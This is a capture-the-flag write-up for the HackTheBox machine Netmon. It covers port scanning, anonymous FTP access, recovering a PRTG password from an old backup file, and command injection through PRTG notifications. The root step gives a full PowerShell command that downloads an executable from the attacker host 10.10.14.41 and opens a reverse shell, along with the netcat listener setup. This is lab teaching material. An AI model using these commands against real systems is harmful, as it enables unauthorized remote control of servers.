HackTheBox Write-Up - Netmon

Netmon is our target for this week’s HackTheBox report. This was one of the easier times I’ve had with HackTheBox, so hopefully the write-up won’t be too painful.

Starting out, we run Nmap:

nmap -sC -sV -oA Netmon 10.10.10.152

Explanations:

-sC - Script scanning using the default script list.
-sV - Attempts version detection of protocols/applications during scan.
-oA - Output files in all formats
Netmon - The name of the files for -oA output.
10.10.10.152 - The target machine’s IP address.

The only ports open on this box are FTP and HTTP. The website is running PRTG:

Before I start poking around FTP, I do the usual thing and kick off some web tools:

gobuster -u http://10.10.10.152 -w /usr/share/wordlists/dirb/small.txt -o Netmon.gob.txt

Explanations:

-u - Specifies the URL to gobust.
-w - Specifies the wordlist to use for brute-forcing directories. I find that small.txt is a good, default starting point for me. If needed, I can work my way up to bigger wordlists, but it hasn’t been necessary for me up to this point.
-o - Specifies the ouput file name.

nikto -host 10.10.10.152 -port 80 -output Netmon.nikto

Explanations:

-host - Specifies the target hostname/IP address.
-port - Specified the target port number.
-output - Specifies the output file name.

I didn’t learn anything from either tool, so I turn my attention to FTP. You may have noticed in the Nmap results that FTP supports anonymous logins. We’re going to utilize that fact right now and connect with ncftp:

Once we’ve connected, it doesn’t take long to locate the user flag in \users\public. We can get it to our machine with FTP and read it. Now we’re ready to start escalating our way towards root.

Netmon-User

While we’re still connected to FTP, we need to look around. I am much more familiar with Windows machines than I am with Linux, so it doesn’t take me long to find the ProgramData folder, which is normally hidden, but we can forcefully browse to it even if it isn’t listed. I immediately see the Paessler folder and continue to drill down and explore the file structure. I also spend some time Googling vulnerabilities for PRTG while exploring, and I stumble upon a post indicating that PRTG versions earlier than 17.4.35.3326 stored plaintext credentials in configuration files. On Netmon, there are a few different configuration files, but if we take our time and be thorough, we’ll read through each one and eventually discover that PRTG Configuration.old.bak contains the password:

However, this password does not let us into the admin menu. Think about it, though: what year is it?

Because 'Twin Peaks' references are necessary.

This one was for you, @tr4cefl0w.

That’s right: the box was released in 2019. This .bak file is from 2018. The password has likely changed since then, so if we simply tweak the password to reflect the new year…

…we’ll get in! We now have access to the web GUI of PRTG. We can spend some time poking around, but I also elected to go on the hunt for some pre-existing published vulnerabilities for RCE in PRTG. It didn’t take long for me to stumble onto a flaw in the notifications feature of PRTG wherein the parameter text field is passed directly into a PowerShell script that is then run as part of the notification. We can even force the notifications to run by “testing” them.

Personally, I didn’t see the point in trying to just read the root flag. Why not aim high and try to get a shell? To that end, I started my preparations.

First, we need to host our chosen shell. I love this simple reverse shell by infoskirmish, so I host a SimpleHTTPServer on my attacking machine in the same directory as the shell executable:

python -m SimpleHTTPServer 9009

Explanations:

-m - Run a module.
SimpleHTTPServer - Launch a simple HTTP server, as the name implies.
9009 - The port on which the server will listen for incoming connections.

If we really want to do this in one shot, we need to get our netcat listener set up now, as well:

nc -lp 2113

Explanations:

-l - Listen mode.
-p 2113 - Specifies the port on which to listen.

With our attacking box fully prepped to host the shell executable and the listener ready to catch the reverse shell, let’s craft a command to accomplish both the download and execution of the shell:

powershell -command "((new-object System.Net.WebClient).DownloadFile('http://10.10.14.41:9009/shell.exe', 'C:\Users\Public\shell.exe'))"; "c:\windows\system32\cmd.exe /c C:\Users\Public\shell.exe 10.10.14.41 2113"

Explanations:

-command - Specifies that everything in the following () will be executed as a command.
new-object System.Net.WebClient - Creates an object of the type System.Net.WebClient.
.DownloadFile - Calls the DownloadFile file function from System.Net.WebClient with the source and destination as parameters.
; - Indicates a second, separate command to be run after the first string.

In PRTG, proceed to “Setup” > “Account Settings” > “Notifications”. Select the little plus sign on the right of the page to add a new notification. Name the notification whatever you want. Further down the page, you’ll see an option to “Execute Program”. Expand this option, select “Demo exe notification - outfile.ps1” as the Program File and paste in your PowerShell command as the Parameter. Save the notification.

Once you are back at the notification screen, highlight your notification, then from the menu on the right-hand side that appears select the bell icon to “Send test notification”. This will cause your PowerShell command to be included in the demo .ps1 file, thus downloading and executing your shell.

Netmon-Root

And that, dear readers, is Netmon. I hope you enjoyed this quick, breezy little box. See you next time!

7 Likes

Good stuff! Thanks for the shell as well, I’ll give it a closer look.

2 Likes